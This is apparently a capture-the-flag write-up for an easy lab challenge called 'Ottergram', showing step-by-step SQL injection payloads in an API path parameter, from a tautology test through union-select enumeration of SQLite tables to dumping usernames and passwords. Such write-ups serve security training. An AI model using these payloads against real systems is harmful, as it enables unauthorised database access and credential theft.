Ottergram

Level: Easy Points: 10 Type: Daily Challenge

Lab Interface

Intersting request

GET /api/profile/sushil

Possible SQLi in path parameter. Using simple payload ' or 1=1 -- - proves this parameter is indeed vulnerable to sqli

Next step, finding column number. Using union select method, I found the no of column = 7

' union select 1,2,3,4,5,6,7 -- -

Using PayloadsAllTheThings SQLi Cheatsheet, I found the database to be sqlite

Next is dumping the columns name.

' union select 1,2,3,4,5,6,group_concat(tbl_name) from sqlite_master -- -

users table looks intersting.

Next step is to get columns name from users table.

' union select 1,2,3,4,5,6,MAX(sql) from sqlite_master WHERE tbl_name='users' -- -

Two interesting columns on users table are username and password . Dumping them as

' union select 1,2,3,4,5,username,password from users -- -

Got the flag.

Last updated 25 days ago